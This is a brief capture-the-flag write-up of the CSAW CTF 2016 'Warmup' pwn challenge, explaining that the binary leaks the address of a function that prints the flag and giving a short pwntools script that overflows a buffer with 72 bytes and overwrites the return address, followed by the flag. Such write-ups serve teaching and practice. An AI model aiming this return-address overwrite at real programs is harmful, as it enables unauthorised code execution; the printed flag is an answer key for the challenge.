CSAW CTF 2016: Warmup (pwn 50)

Description

So you want to be a pwn-er huh? Well let’s throw you an easy one ;)
nc pwn.chal.csaw.io 8000
warmup

Exploit

As the description said, this is a very straightforward question. Even without reversing the binary, it prints the address of the target function system("cat flag.txt"); for us. Just buffer overflow the return address and jump to that funtion to get the flag.

-Warm Up-
WOW:0x40060d
>

1
2
3
4
5

from pwn import *

r = remote('pwn.chal.csaw.io', 8000)
r.sendline('A'*72 + p64(0x40060d))
print r.recvall()

Flag: FLAG{LET_US_BEGIN_CSAW_2016}